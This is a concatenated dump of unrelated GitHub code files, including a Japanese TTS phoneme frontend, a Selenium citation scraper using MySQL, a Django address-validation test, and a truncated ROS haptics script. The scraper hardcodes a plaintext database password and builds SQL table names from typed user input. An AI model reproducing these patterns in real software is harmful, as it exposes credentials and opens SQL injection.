q_full.to_mongo()\n","repo_name":"volfpeter/motorhead","sub_path":"tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"16047344234","text":"import re\n\n# 音素 (+pau/sil)\nphonemes = [\n \"A\",\n \"E\",\n \"I\",\n \"N\",\n \"O\",\n \"U\",\n \"a\",\n \"b\",\n \"by\",\n \"ch\",\n \"cl\",\n \"d\",\n \"dy\",\n \"e\",\n \"f\",\n \"g\",\n \"gy\",\n \"h\",\n \"hy\",\n \"i\",\n \"j\",\n \"k\",\n \"ky\",\n \"m\",\n \"my\",\n \"n\",\n \"ny\",\n \"o\",\n \"p\",\n \"py\",\n \"r\",\n \"ry\",\n \"s\",\n \"sh\",\n \"t\",\n \"ts\",\n \"ty\",\n \"u\",\n \"v\",\n \"w\",\n \"y\",\n \"z\",\n \"pau\",\n \"sil\",\n]\n\nextra_symbols = [\n \"^\", # 文の先頭を表す特殊記号 \n \"$\", # 文の末尾を表す特殊記号 (通常)\n \"?\", # 文の末尾を表す特殊記号 (疑問系)\n \"_\", # ポーズ\n \"#\", # アクセント句境界\n \"[\", # ピッチの上がり位置\n \"]\", # ピッチの下がり位置\n]\n\n_pad = \"~\"\n\n# NOTE: 0 をパディングを表す数値とする\nsymbols = [_pad] + extra_symbols + phonemes\n\n\n_symbol_to_id = {s: i for i, s in enumerate(symbols)}\n_id_to_symbol = {i: s for i, s in enumerate(symbols)}\n\n\ndef numeric_feature_by_regex(regex, s):\n match = re.search(regex, s)\n if match is None:\n return -50\n return int(match.group(1))\n\n\ndef pp_symbols(labels, drop_unvoiced_vowels=True):\n \"\"\"Extract phoneme + prosoody symbol sequence from input full-context labels\n\n The algorithm is based on [Kurihara 2021] [1]_ with some tweaks.\n\n Args:\n labels (HTSLabelFile): List of labels\n drop_unvoiced_vowels (bool): Drop unvoiced vowels. Defaults to True.\n\n Returns:\n list: List of phoneme + prosody symbols\n\n .. ipython::\n\n In [11]: import ttslearn\n\n In [12]: from nnmnkwii.io import hts\n\n In [13]: from ttslearn.tacotron.frontend.openjtalk import pp_symbols\n\n In [14]: labels = hts.load(ttslearn.util.example_label_file())\n\n In [15]: \" \".join(pp_symbols(labels.contexts))\n Out[15]: '^ m i [ z u o # m a [ r e ] e sh i a k a r a ... $'\n\n .. [1] K. Kurihara, N. Seiyama, and T. Kumano, “Prosodic features control by\n symbols as input of sequence-to-sequence acoustic modeling for neural tts,”\n IEICE Transactions on Information and Systems, vol. E104.D, no. 2,\n pp. 302–311, 2021.\n \"\"\"\n PP = []\n N = len(labels)\n\n # 各音素毎に順番に処理\n for n in range(N):\n lab_curr = labels[n]\n\n # 当該音素\n p3 = re.search(r\"\\-(.*?)\\+\", lab_curr).group(1) # type: ignore\n\n # 無声化母音を通常の母音として扱う\n if drop_unvoiced_vowels and p3 in \"AEIOU\":\n p3 = p3.lower()\n\n # 先頭と末尾の sil のみ例外対応\n if p3 == \"sil\":\n assert n == 0 or n == N - 1\n if n == 0:\n PP.append(\"^\")\n elif n == N - 1:\n # 疑問系かどうか\n e3 = numeric_feature_by_regex(r\"!(\\d+)_\", lab_curr)\n if e3 == 0:\n PP.append(\"$\")\n elif e3 == 1:\n PP.append(\"?\")\n continue\n elif p3 == \"pau\":\n PP.append(\"_\")\n continue\n else:\n PP.append(p3)\n\n # アクセント型および位置情報(前方または後方)\n a1 = numeric_feature_by_regex(r\"/A:([0-9\\-]+)\\+\", lab_curr)\n a2 = numeric_feature_by_regex(r\"\\+(\\d+)\\+\", lab_curr)\n a3 = numeric_feature_by_regex(r\"\\+(\\d+)/\", lab_curr)\n # アクセント句におけるモーラ数\n f1 = numeric_feature_by_regex(r\"/F:(\\d+)_\", lab_curr)\n\n a2_next = numeric_feature_by_regex(r\"\\+(\\d+)\\+\", labels[n + 1])\n\n # アクセント句境界\n if a3 == 1 and a2_next == 1 and p3 in \"aeiouAEIOUNcl\":\n PP.append(\"#\")\n # ピッチの立ち下がり(アクセント核)\n elif a1 == 0 and a2_next == a2 + 1 and a2 != f1:\n PP.append(\"]\")\n # ピッチの立ち上がり\n elif a2 == 1 and a2_next == 2:\n PP.append(\"[\")\n\n return PP\n\n\ndef num_vocab():\n \"\"\"Get number of vocabraries\n\n Returns:\n int: Number of vocabraries\n\n Examples:\n\n >>> from ttslearn.tacotron.frontend.openjtalk import num_vocab\n >>> num_vocab()\n >>> 52\n \"\"\"\n return len(symbols)\n\n\ndef text_to_sequence(text):\n \"\"\"Convert phoneme + prosody symbols to sequence of numbers\n\n Args:\n text (list): text as a list of phoneme + prosody symbols\n\n Returns:\n list: List of numbers\n\n Examples:\n\n >>> from ttslearn.tacotron.frontend.openjtalk import text_to_sequence\n >>> text_to_sequence([\"^\", \"m\", \"i\", \"[\", \"z\",\"o\", \"$\"])\n >>> [1, 31, 27, 6, 49, 35, 2]\n \"\"\"\n return [_symbol_to_id[s] for s in text]\n\n\ndef sequence_to_text(seq):\n \"\"\"Convert sequence of numbers to phoneme + prosody symbols\n\n Args:\n seq (list): Input sequence of numbers\n\n Returns:\n list: List of phoneme + prosody symbols\n\n Examples:\n\n >>> from ttslearn.tacotron.frontend.openjtalk import sequence_to_text\n >>> sequence_to_text([1, 31, 27, 6, 49, 35, 2])\n >>> ['^', 'm', 'i', '[', 'z', 'o', '$']\n \"\"\"\n return [_id_to_symbol[s] for s in seq]\n","repo_name":"r9y9/ttslearn","sub_path":"ttslearn/tacotron/frontend/openjtalk.py","file_name":"openjtalk.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"52"} +{"seq_id":"1362601867","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"csv_file_validator\",\n version=\"0.0.1\",\n author=\"datahappy1\",\n author_email=\"\",\n description=\"csv file validation framework\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/datahappy1/csv_file_validator\",\n packages=setuptools.find_packages(),\n include_package_data=True,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"datahappy1/csv_file_validator","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"21066125655","text":"import time\nimport pyperclip\nimport re\nimport mysql.connector\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nimport os\n\nokstate_url = 'https://library.okstate.edu/'\ngeneric_url1 = 'https://okstate-stillwater.primo.exlibrisgroup.com/discovery/search?query=any,contains,'\ngeneric_url2 = '&tab=Everything&search_scope=MyInst_and_CI&vid=01OKSTATESTILL_OKSTAT:OKSTAT&offset=0'\nusername = 'hhassan'\n\n\n#\n# THE MAJORITY OF THE FOLLOWING IS LEGACY CODE AND IS UNCOMMENTED. MOST OF THIS IS PRESENT IN THE FINAL PROJECT\n# IN ONE FORM OR ANOTHER, BUT ANY COMMENTS TO ITS RELEVANCE AND FUNCTION ARE MADE IN THE FINAL PROJECT CODE.\n#\n\ndef navToDOI(newDOI):\n newDOI.replace('/', '~2F')\n driver.get(generic_url1 + newDOI + generic_url2)\n\n driver.refresh()\n\n time.sleep(2)\n\n searchResults = driver.find_element_by_tag_name(\"prm-brief-result-container\")\n\n try:\n for element in searchResults:\n element.click()\n print(\"clicked\")\n\n except:\n searchResults.click()\n\n time.sleep(2)\n driver.find_element_by_css_selector(\"#Citation\").click()\n time.sleep(0.5)\n driver.find_element_by_xpath(\"//span[contains(text(),'MLA (8th edition)')]\").click()\n time.sleep(0.5)\n driver.find_element_by_xpath(\"//button[@id='copy-citation-button']\").click()\n\n citationInfo = pyperclip.paste()\n print(citationInfo)\n\n try:\n driver.find_element_by_xpath(\"//span[contains(text(),'cited in this')]\").click()\n\n hasCited = True\n print(hasCited)\n\n except:\n hasCited = False\n print(hasCited)\n\n driver.save_screenshot(\"scrnsht.png\")\n\n return citationInfo, hasCited\n\n\ndef navToCitations(newDOI, levelNumber):\n citationinfo = username + '_citationinfo'\n citationcount = username + '_citationcount'\n placeholderDOI = newDOI\n newDOI.replace('/', '~2F')\n driver.get(generic_url1 + newDOI + generic_url2)\n\n driver.refresh()\n\n time.sleep(2)\n\n try:\n searchResults = driver.find_element_by_tag_name(\"prm-brief-result-container\")\n\n except:\n print(\"Something went wrong. It appears that a DOI cannot be found: \" + newDOI)\n sql = \"DELETE FROM {citationinfo} \" \\\n \"WHERE DOI = (%s)\".format(citationinfo=citationinfo)\n val = placeholderDOI\n mycursor.execute(sql, (val,))\n return\n\n try:\n for element in searchResults:\n element.click()\n print(\"clicked\")\n\n except:\n searchResults.click()\n\n time.sleep(2)\n\n try:\n driver.find_element_by_xpath(\"//span[contains(text(),'cited in this')]\").click()\n\n except:\n print(\"Something went wrong. It appears that a citation flag was set incorrectly for DOI\" + newDOI)\n sql = \"UPDATE {citationinfo} \" \\\n \"SET HasButton = 0 \" \\\n \"WHERE DOI = (%s)\".format(citationinfo=citationinfo)\n val = placeholderDOI\n mycursor.execute(sql, (val,))\n return\n\n time.sleep(3)\n\n try:\n driver.find_element_by_tag_name(\"prm-brief-result-container\").click()\n\n except:\n print(\"Something went wrong. It appears that no results appeared for DOI\" + newDOI)\n sql = \"UPDATE {citationinfo} \" \\\n \"SET Visited = 1 \" \\\n \"WHERE DOI = (%s)\".format(citationinfo=citationinfo)\n val = placeholderDOI\n mycursor.execute(sql, (val,))\n return\n\n count = 0\n\n try:\n while True:\n\n time.sleep(2)\n driver.find_element_by_xpath(\n \"//body/primo-explore[1]/div[3]/div[1]/md-dialog[1]/md-dialog-content[1]/sticky-scroll[1]/prm-full-view[1]/div[1]/div[1]/div[1]/div[1]/div[1]/div[3]/div[1]/prm-full-view-service-container[1]/div[2]/prm-action-list[1]/md-nav-bar[1]/div[1]/nav[1]/ul[1]/div[1]/li[5]/button[1]/span[1]/div[1]/prm-icon[1]/md-icon[1]\").click()\n\n time.sleep(0.5)\n driver.find_element_by_xpath(\"//span[contains(text(),'MLA (8th edition)')]\").click()\n time.sleep(0.5)\n driver.find_element_by_xpath(\"//button[@id='copy-citation-button']\").click()\n\n citationInfo = pyperclip.paste()\n print(citationInfo)\n\n try:\n driver.find_element_by_xpath(\"//span[contains(text(),'cited in this')]\")\n\n hasCited = True\n print(hasCited)\n\n except:\n hasCited = False\n print(hasCited)\n\n time.sleep(3)\n if count == 0:\n driver.find_element_by_xpath(\n \"//body/primo-explore[1]/div[3]/div[1]/button[2]/prm-icon[1]/md-icon[1]\").click()\n\n else:\n\n driver.find_element_by_xpath(\n \"//body/primo-explore[1]/div[3]/div[1]/button[3]/prm-icon[1]/md-icon[1]\").click()\n\n count += 1\n\n doi, author, title, journal, year = parseCitationIntoArray(citationInfo)\n\n if doi == -1:\n continue\n\n try:\n print(\"attempting to insert: \" + doi)\n sql = \"INSERT INTO {citationinfo} (LevelNumber, DOI, Authors, Title, Journal, Year, HasButton, Visited) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\".format(citationinfo=citationinfo)\n\n if hasCited:\n val = (levelNumber, doi, author, title, journal, year, 1, 0)\n\n else:\n val = (levelNumber, doi, author, title, journal, year, 0, 0)\n\n mycursor.execute(sql, val)\n print(\"inserted.\")\n\n print(\"attempting to add to citation count: \" + doi)\n sql = \"INSERT INTO {citationcount} (DOI, CitationCount) \" \\\n \"VALUES (%s, %s)\".format(citationcount=citationcount)\n val = (doi, 1)\n mycursor.execute(sql, val)\n print(\"added.\")\n\n mydb.commit()\n\n except Exception as e:\n print(e)\n sql = \"UPDATE {citationcount} \" \\\n \"SET Count = Count + 1 \" \\\n \"WHERE DOI = (%s)\".format(citationcount=citationcount)\n val = '\\'' + doi + '\\''\n mycursor.execute(sql, val)\n\n\n except Exception as e:\n print(e)\n print(\"exited at count: \" + str(count))\n\n\ndef iterativeCitationFind():\n citationinfo = username + '_citationinfo'\n attemptCount = 0\n for x in range(1000):\n try:\n sql = \"SELECT DOI \" \\\n \"FROM {citationinfo} \" \\\n \"WHERE HasButton = 1 \" \\\n \"AND Visited = 0 \" \\\n \"ORDER BY LevelNumber\".format(citationinfo=citationinfo)\n\n mycursor.execute(sql)\n\n results = mycursor.fetchall()\n\n print(\"Here are the DOIs to be iterated through:\")\n for doiResult in results:\n newDOI = str(doiResult).replace(\"'\", '')[1:-2]\n print(str(newDOI))\n\n for doiResult in results:\n\n newDOI = str(doiResult).replace(\"'\", '')[1:-2]\n\n navToCitations(newDOI, attemptCount)\n\n try:\n sql = \"UPDATE {citationinfo} \" \\\n \"SET Visited = 1 \" \\\n \"WHERE DOI = (%s)\".format(citationinfo=citationinfo)\n val = doiResult\n\n mycursor.execute(sql, val)\n\n except Exception as e:\n print(e)\n print(\"Something happened when trying to set to Visited.\")\n\n\n except:\n print(attemptCount)\n attemptCount += 1\n if (attemptCount > 10):\n return\n\n\ndef parseCitationIntoArray(citation):\n firstQuote = citation.find('“')\n secondQuote = citation.find('”')\n doiIndex = citation.find('doi:')\n\n author = citation[0:firstQuote].strip()\n title = citation[firstQuote:(secondQuote + 1)]\n journal = citation[(secondQuote + 1):citation.find(',', secondQuote)].strip()\n year = re.search('(19|20)\\d{2},', citation).group(0)[:-1]\n if doiIndex == -1:\n doi = -1\n\n else:\n doi = citation[(doiIndex + 4):-3]\n\n print(author)\n print(title)\n print(journal)\n print(year)\n print(doi)\n\n return doi, author, title, journal, year\n\n\ndef addPaperToStart(newDOI):\n citationinfo = username + '_citationinfo'\n papersread = username + '_papersread'\n\n rawCitation, tag = navToDOI(newDOI)\n doi, author, title, journal, year = parseCitationIntoArray(rawCitation)\n\n try:\n sql = \"INSERT INTO {citationinfo} (LevelNumber, DOI, Authors, Title, Journal, Year, HasButton, Visited) \" \\\n \"VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\".format(citationinfo=citationinfo)\n val = (-1, doi, author, title, journal, year, tag, 0)\n\n mycursor.execute(sql, val)\n\n mydb.commit()\n\n except:\n return\n\n try:\n sql = \"INSERT INTO {papersread} (DOI, RelevanceRating) \" \\\n \"VALUES (%s, %s)\".format(papersread=papersread)\n val = (doi, 5)\n\n mycursor.execute(sql, val)\n\n mydb.commit()\n\n except:\n return\n\n\ndef findExistingUser(username):\n try:\n sql = \"SELECT username FROM user \" \\\n \"WHERE username = (%s)\"\n val = username\n\n mycursor.execute(sql, (val,))\n\n result = mycursor.fetchall()\n\n print(result)\n\n except Exception as e:\n print(e)\n print(\"No user with that username.\")\n\n\ndef changeUsers():\n print(\"MISSING CODE: changeUsers\")\n\n\ndef addUser():\n newUsername = input(\"Please input a new username: \")\n interest1 = input(\"Please input first research interest: \")\n interest2 = input(\"Please input second research interest: \")\n interest3 = input(\"Please input third research interest: \")\n\n citationinfo = newUsername + '_citationinfo'\n citationcount = newUsername + '_citationcount'\n papersread = newUsername + '_papersread'\n\n sql = \"INSERT INTO User (Username, Interest1, Interest2, Interest3) VALUES (%s, %s, %s, %s)\"\n val = (newUsername, interest1, interest2, interest3)\n\n mycursor.execute(sql, val)\n\n mydb.commit()\n\n sql = \"CREATE TABLE IF NOT EXISTS {citationinfo} (\" \\\n \"LevelNumber INT NULL, \" \\\n \"DOI VARCHAR(200) NOT NULL, \" \\\n \"Authors VARCHAR(200) NULL, \" \\\n \"Title LONGTEXT NULL, \" \\\n \"Journal LONGTEXT NULL, \" \\\n \"Year INT NULL, \" \\\n \"HasButton TINYINT NULL, \" \\\n \"Visited TINYINT NULL, \" \\\n \"PRIMARY KEY (DOI))\".format(citationinfo=citationinfo)\n\n mycursor.execute(sql)\n\n mydb.commit()\n\n sql = \"CREATE TABLE IF NOT EXISTS {papersread} (\" \\\n \"`DOI` VARCHAR(60) NOT NULL, \" \\\n \"`RelevanceRating` INT NULL, \" \\\n \"PRIMARY KEY (`DOI`))\".format(papersread=papersread)\n\n mycursor.execute(sql)\n\n mydb.commit()\n\n sql = \"CREATE TABLE IF NOT EXISTS {citationcount} (\" \\\n \"`DOI` VARCHAR(60) NOT NULL, \" \\\n \"`CitationCount` INT NULL, \" \\\n \"PRIMARY KEY (`DOI`))\".format(citationcount=citationcount)\n\n mycursor.execute(sql)\n\n mydb.commit()\n\n #sql = \"CREATE TABLE IF NOT EXISTS {papersread} (\" \\\n # \"`DOI` VARCHAR(60) NOT NULL, \" \\\n # \"`RelevanceRating` INT NULL, \" \\\n # \"INDEX %s (`DOI` ASC) \" \\\n # \"PRIMARY KEY (`DOI`), \" \\\n # \"CONSTRAINT %s \" \\\n # \"FOREIGN KEY (`DOI`) \" \\\n # \"REFERENCES {citationinfo} (`DOI`) \" \\\n # \"ON DELETE CASCADE \" \\\n # \"ON UPDATE CASCADE)\".format(papersread=papersread, citationinfo=citationinfo)\n\n #constraint = newUsername + '_fk_papers read_citation info1'\n #index = newUsername + '_fk_papers read_citation info1_idx'\n\n #val = (constraint, index)\n\n #mycursor.execute(sql, val)\n\n #index = newUsername + '_fk_citation = count_citation info_idx'\n #constraint = newUsername + '_fk_citation count_citation info'\n\n #sql = \"CREATE TABLE IF NOT EXISTS {citationcount} (\" \\\n # \"`DOI` VARCHAR(60) NOT NULL, \" \\\n # \"`CitationCount` INT NULL, \" \\\n # \"INDEX {'index'} (`DOI` ASC),\" \\\n # \"PRIMARY KEY (`DOI`),\" \\\n # \"CONSTRAINT {'constraint'}\" \\\n # \"FOREIGN KEY (`DOI`)\" \\\n # \"REFERENCES {citationinfo} (`DOI`)\" \\\n # \"ON DELETE CASCADE \" \\\n # \"ON UPDATE CASCADE)\".format(citationcount=citationcount, index=index, constraint=constraint, citationinfo=citationinfo)\n\n #val = (index, constraint)\n\n\ndef clearWeb():\n citationinfo = username + '_citationinfo'\n citationcount = username + '_citationcount'\n\n sql = \"DELETE FROM {citationinfo} \" \\\n \"WHERE levelnumber > -1\".format(citationinfo=citationinfo)\n\n mycursor.execute(sql)\n mydb.commit()\n\n sql = \"DELETE FROM {citationcount}\".format(citationcount=citationcount)\n\n mycursor.execute(sql)\n mydb.commit()\n\n\ndef showRecommendedPapers():\n papersread = username + '_papersread'\n citationinfo = username + '_citationinfo'\n\n try:\n sql = \"SELECT Interest1, Interest2, Interest3 \" \\\n \"FROM User \" \\\n \"WHERE Username = (%s)\"\n\n val = (username, )\n\n mycursor.execute(sql, val)\n\n result = mycursor.fetchall()\n\n interest1, interest2, interest3 = result[0][0], result[0][1], result[0][2]\n\n except Exception as e:\n print(e)\n\n try:\n sql = \"SELECT DOI, Title, Authors, Journal, Year \" \\\n \"FROM {citationinfo} \" \\\n \"WHERE Title LIKE CONCAT('%',(%s),'%') \" \\\n \"OR Title LIKE CONCAT('%',(%s),'%') \" \\\n \"OR Title LIKE CONCAT('%',(%s),'%')\".format(citationinfo=citationinfo)\n\n val = (interest1, interest2, interest3)\n\n mycursor.execute(sql, val)\n\n results = mycursor.fetchall()\n\n for result in results:\n print(result)\n\n except Exception as e:\n print(e)\n\n\n\n\n\n\ndef showPapersInRange(year1, year2):\n citationinfo = 'citationinfo'\n\n try:\n sql = \"SELECT DOI, Title, Year FROM {citationinfo} \" \\\n \"WHERE Year >= (%s) AND Year <= (%s)\" \\\n \"ORDER BY Year\".format(citationinfo=citationinfo)\n\n val = (year1, year2)\n\n mycursor.execute(sql, val)\n\n results = mycursor.fetchall()\n\n for result in results:\n print(result)\n\n\n except Exception as e:\n print(e)\n\n\ndef showSharedPapers(username1, username2):\n citationinfo1 = username1 + '_citationinfo'\n citationinfo2 = username2 + '_citationinfo'\n\n try:\n sql = \"SELECT t1.DOI, t1.Title \" \\\n \"FROM {citationinfo1} as t1 \" \\\n \"INNER JOIN {citationinfo2} as t2 \" \\\n \"ON t1.DOI = t2.DOI\".format(citationinfo1=citationinfo1, citationinfo2=citationinfo2)\n\n mycursor.execute(sql)\n\n results = mycursor.fetchall()\n\n for result in results:\n print(result)\n\n sql = \"SELECT COUNT(*) \" \\\n \"FROM \" \\\n \"(SELECT t1.DOI, t1.Title \" \\\n \"FROM {citationinfo1} as t1 \" \\\n \"INNER JOIN {citationinfo2} as t2 \" \\\n \"ON t1.DOI = t2.DOI)\" \\\n \"AS matched\".format(citationinfo1=citationinfo1, citationinfo2=citationinfo2)\n\n mycursor.execute(sql)\n\n result = mycursor.fetchall()\n\n print(result[0][0])\n\n except Exception as e:\n print(e)\n\ndef showAllPapers(username1, username2):\n citationinfo1 = username1 + '_citationinfo'\n citationinfo2 = username2 + '_citationinfo'\n\n try:\n sql = \"SELECT DOI, Title \" \\\n \"FROM {citationinfo1} \" \\\n \"UNION DISTINCT \" \\\n \"SELECT DOI, Title \" \\\n \"FROM {citationinfo2}\".format(citationinfo1=citationinfo1, citationinfo2=citationinfo2)\n\n mycursor.execute(sql)\n\n results = mycursor.fetchall()\n\n for result in results:\n print(result)\n\n sql = \"SELECT COUNT(*) \" \\\n \"FROM \" \\\n \"(SELECT DOI, Title \" \\\n \"FROM {citationinfo1} \" \\\n \"UNION DISTINCT \" \\\n \"SELECT DOI, Title \" \\\n \"FROM {citationinfo2})\" \\\n \"AS total\".format(citationinfo1=citationinfo1, citationinfo2=citationinfo2)\n\n mycursor.execute(sql)\n\n result = mycursor.fetchall()\n\n print(result[0][0])\n\n except Exception as e:\n print(e)\n\n\n#rawCitation, tag = navToDOI('10.1038/nchembio.2217')\n#parseCitationIntoArray(rawCitation)\n\n#navToDOI('10.1021~2Fcb6003756')\n\n#DOI for demo:\n#doi:10.1038/nchembio.2217\n\n#chrome_options = Options()\n#chrome_options.add_argument(\"--headless\")\n#chrome_options.add_argument(\"--window-size=1920x1080\")\n#options=chrome_options\n\ndriver = webdriver.Chrome()\n\nmydb = mysql.connector.connect(\n host=\"localhost\",\n user=\"RWalderbach\",\n password=\"SQLPassword19\",\n database=\"demodatabase\"\n)\n\nmycursor = mydb.cursor()\n\n#mycursor.execute(\"DELETE FROM citationinfo\")\n#mycursor.execute(\"DELETE FROM citationcount\")\n\n#rawCitation, tag = navToDOI('10.1038/nchembio.2217')\n#doi, author, title, journal, year = parseCitationIntoArray(rawCitation)\n#\n#sql = \"INSERT INTO citationinfo (LevelNumber, DOI, Authors, Title, Journal, Year, HasButton, Visited) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\n#val = (0, doi, author, title, journal, year, 1, 0)\n#\n#mycursor.execute(sql, val)\n#\n#mydb.commit()\n\n#navToCitations('10.1038/nchembio.2217', 1)\n\n#\n\n#addUser()\n\n#addPaperToStart('10.1111/febs.14185')\niterativeCitationFind()\n\n#findExistingUser(input(\"Enter a username: \"))\n\n#showPapersInRange(2000, 2010)\n\n#showSharedPapers('rwalderbach', 'hhassan')\n\n#showRecommendedPapers()","repo_name":"RWalderbach/CHEM4433_Project_Code","sub_path":"LibraryOkstate.py","file_name":"LibraryOkstate.py","file_ext":"py","file_size_in_byte":17728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9808486421","text":"from json import dumps, load\nfrom os.path import abspath, dirname, join\nfrom unittest.mock import MagicMock\n\nfrom django.contrib.gis.geos import Point\nfrom django.test import SimpleTestCase\nfrom requests.exceptions import ConnectionError\nfrom requests_mock.mocker import Mocker\nfrom rest_framework.exceptions import ValidationError\n\nfrom signals.apps.api.validation.address.base import (\n AddressValidationUnavailableException,\n NoResultsException\n)\nfrom signals.apps.api.validation.address.mixin import AddressValidationMixin\nfrom signals.apps.api.validation.address.pdok import PDOKAddressValidation\n\n\nclass TestPDOKAddressValidation(SimpleTestCase):\n PDOK_RESPONSE_JSON = \"pdok_result.json\"\n pdok_response = None\n address_dict = {\n \"openbare_ruimte\": \"Geuzenkade\",\n \"huisnummer\": 55,\n \"huisletter\": \"\",\n \"huisnummer_toevoeging\": \"1\",\n \"postcode\": \"1056KN\",\n \"woonplaats\": \"Amsterdam\"\n }\n\n def _get_mocked_response(self):\n if self.pdok_response is None:\n with open(join(dirname(abspath(__file__)), self.PDOK_RESPONSE_JSON)) as f:\n self.pdok_response = load(f)\n return self.pdok_response\n\n def test_no_results(self):\n address_validation = PDOKAddressValidation()\n address_validation._search = MagicMock(return_value=[])\n\n self.assertRaises(NoResultsException, address_validation.validate_address, self.address_dict)\n\n address_validation._search.assert_called_with(self.address_dict)\n\n def test_no_results_allow_unverified(self):\n address_validation = PDOKAddressValidation()\n address_validation._search = MagicMock(return_value=[])\n\n validation_mixin = AddressValidationMixin()\n validation_mixin.get_address_validation = MagicMock(return_value=address_validation)\n\n location_data = {\n 'geometrie': Point(4.898466, 52.361585),\n 'address': self.address_dict,\n }\n\n with self.settings(ALLOW_INVALID_ADDRESS_AS_UNVERIFIED=False):\n self.assertRaises(ValidationError, validation_mixin.validate_location, location_data)\n with self.settings(ALLOW_INVALID_ADDRESS_AS_UNVERIFIED=True):\n try:\n validation_mixin.validate_location(location_data)\n except ValidationError:\n self.fail(\"Should not raise exception because of setting\")\n\n def test_address_found(self):\n address_validation = PDOKAddressValidation()\n\n result = self._get_mocked_response()[\"response\"][\"docs\"][0]\n\n address_validation._search = MagicMock(return_value=[result])\n address_validation._search_result_to_address = MagicMock()\n\n address_validation.validate_address(self.address_dict)\n\n address_validation._search.assert_called_with(self.address_dict)\n address_validation._search_result_to_address.assert_called_with(result)\n\n def test_search_unavailable(self):\n address_validation = PDOKAddressValidation()\n\n with Mocker() as m:\n m.get(address_validation.address_validation_url, status_code=400)\n self.assertRaises(AddressValidationUnavailableException, address_validation._search, self.address_dict)\n\n def test_search_connection_error(self):\n address_validation = PDOKAddressValidation()\n\n with Mocker() as m:\n m.get(address_validation.address_validation_url, exc=ConnectionError)\n self.assertRaises(AddressValidationUnavailableException, address_validation._search, self.address_dict)\n\n def test_search_successful_request(self):\n address_validation = PDOKAddressValidation()\n\n result = self._get_mocked_response()\n expected = result[\"response\"][\"docs\"]\n\n with Mocker() as m:\n m.get(address_validation.address_validation_url, text=dumps(result))\n self.assertEqual(address_validation._search(self.address_dict), expected)\n","repo_name":"Amsterdam/signals","sub_path":"app/signals/apps/api/tests/address/test_validation.py","file_name":"test_validation.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"52"} +{"seq_id":"3824298878","text":"#File name: sqlfunctions.py\n#Description: Contains several functions for connecting to sql server database\n# and execute sql server\n#Author(s): Connor Weldy, Nozomu Ohno, Michael Laramie\n\nimport pyodbc #used for executing sql statements\n\n#Name: executeSQL\n#Purpose: executes an sql query\n#Input: string sqlStatement - the query to be executed\n#Output: a cursor that contains the results of the query\ndef executeSQL(sqlStatement):\n crsr = connectSQLServer() #connect to the server\n return crsr.execute(sqlStatement) #return the cursor of the sql query\n\n#Name: insertSQL\n#Purpose: executes an sql query that changes a record in the database\n#Input: string sqlStatement - the query to be executed\n#Output: nothing - void. the tuple is inserted into the database\ndef insertSQL(sqlStatement):\n conn_str = ( #connection string for SQL Server\n r'DRIVER={SQL Server};Server=CS1;Database=FinancialManagement;UID=XXXXXXXXXXXX; PWD=XXXXXXXXXXXX;'\n )\n cnxn = pyodbc.connect(conn_str) #connect to sql server\n crsr = cnxn.cursor()\n variable = crsr.execute(sqlStatement) #execute the sql\n cnxn.commit() #commit the changes to the database since it is inserting (or deleting) a tuple in/from a table\n return variable #void variable\n\n#Name: connectSQLServer\n#Purpose: connects user to sql server for querying - used in executeSQL() and insertSQL()\n#Input: none\n#Output: cnxx.cursor() for sql server\ndef connectSQLServer():\n conn_str = ( #connection string for SQL Server\n r'DRIVER={SQL Server};Server=CS1;Database=FinancialManagement;UID=XXXXXXXXXXXX; PWD=XXXXXXXXXXXX;'\n )\n cnxn = pyodbc.connect(conn_str) #connect to sql server\n return cnxn.cursor()","repo_name":"ConnorWeldy/Class_Projects","sub_path":"Personal_Finance_App/sqlfunctions.py","file_name":"sqlfunctions.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12702197430","text":"#!/usr/bin/env python3\n\n# script to render haptics to dvrk.\n\nimport rospy\n\nfrom sensor_msgs.msg import CompressedImage, JointState\nfrom geometry_msgs.msg import WrenchStamped, PoseStamped, TwistStamped\nfrom std_msgs.msg import Float64MultiArray\n#import cv2\nfrom cv_bridge import CvBridge\n\nimport numpy as np\n\n# all the callback functions are defined here\n\n# PSM1\ndef cb_PSM1_pos_c(msg):\n\tglobal state_input\n\tstate_input[0] = msg.pose.position.x\n\tstate_input[1] = msg.pose.position.y\n\tstate_input[2] = msg.pose.position.z\n\tstate_input[3] = msg.pose.orientation.x\n\tstate_input[4] = msg.pose.orientation.y\n\tstate_input[5] = msg.pose.orientation.z\n\tstate_input[6] = msg.pose.orientation.w\n\ndef cb_PSM1_twist(msg):\n\tglobal state_input\n\tstate_input[7] = msg.twist.linear.x\n\tstate_input[8] = msg.twist.linear.y\n\tstate_input[9] = msg.twist.linear.z\n\tstate_input[10] = msg.twist.angular.x\n\tstate_input[11] = msg.twist.angular.y\n\tstate_input[12] = msg.twist.angular.z\n\ndef cb_PSM1_joint_c(msg):\n\tglobal state_input\n\tstate_input[13:19] = msg.position\n\tstate_input[20:26] = msg.velocity\n\tstate_input[27:33] = msg.effort\n\ndef cb_PSM1_joint_d(msg):\n\tglobal state_input \n\tstate_input[34:40] = msg.position\n\tstate_input[41:47] = msg.effort\n\ndef cb_PSM1_jaw_c(msg):\n\tglobal 